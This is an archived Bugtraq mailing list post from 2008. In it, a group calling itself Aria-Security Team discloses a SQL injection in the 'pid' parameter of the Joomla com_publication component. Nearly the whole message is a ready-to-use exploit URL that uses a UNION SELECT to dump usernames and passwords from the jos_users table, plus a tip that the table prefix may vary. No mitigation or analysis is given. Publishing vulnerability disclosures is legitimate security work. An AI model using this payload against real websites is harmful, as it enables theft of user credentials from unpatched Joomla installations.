Bugtraq: Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

From: No-Reply () Aria-Security Net
Date: 23 Feb 2008 22:14:36 -0000

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz: Aura, imm02tal, Kinglet, iM4n

Joomla Com_publication "pid" Remote SQL Injection

index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/*

note: the prefix (jos_) maybe different for each website...

Regards,
The-0utl4w
Credits Goes to Aria-Security Team

By Date By Thread

Current thread:

Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection No-Reply (Feb 25)